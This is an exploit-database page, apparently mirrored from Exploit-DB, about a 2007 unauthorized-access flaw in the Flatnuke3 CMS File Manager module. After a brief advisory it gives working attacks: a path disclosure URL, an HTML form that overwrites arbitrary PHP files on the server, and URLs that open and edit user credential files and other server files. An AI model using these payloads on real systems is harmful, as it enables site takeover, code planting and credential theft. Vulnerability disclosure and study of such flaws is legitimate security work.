Flatnuke3 File Manager Module - Unauthorized Access

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056328 漏洞类型
发布时间 2007-10-22 更新时间 2007-10-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/30698
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/26155/info

Flatnuke3 is prone to an unauthorized-access vulnerability because it fails to adequately verify administrative credentials while logging in via the 'File Manager' module.

An attacker can exploit this vulnerability to gain administrative control of the application; other attacks are also possible.

This issue affects Flatnuke3-2007-10-10; other versions may also be vulnerable. 

Full Path Disclosure Example:

http://www.example.com/flatnuke3_path/index.php?mod=[forum_path]
&op=disc&argumentname=[a_casual_char]
---------------------------------------------------------------
File Replace Exploit:

<form method="post" action="http://www.example.com/flatnuke3_path/index.php?
mod=none_filemanager&op="><textarea id="body" name="body" cols="90" rows="
35">
</textarea><br><input value="Save" type="submit"><input type="reset">
<input name="opmod" value="save" type="hidden">
<input name="ffile" value="[file_name].php" type="hidden">
<input name="dir" value="/[script_path]/[file_path]" type="hidden"><input
class="button" onclick="history.back()" value="Annulla" type="button"></form>
---------------------------------------------------------------
User Credential View/Edit Exploit:

http://www.example.com/flatnuke3_path/index.php?mod=none_filemanager&dir=/
[script_path]/[flatnuke3_path]/misc/fndatabase/users/&ffile=[username].
php&opmod=open&op=

Or, for example u can view and edit a file located on the server:

http://www.example.com/flatnuke3_path/index.php?mod=none_filemanager&dir=/
[script_path]/&ffile=[file]&opmod=open&op=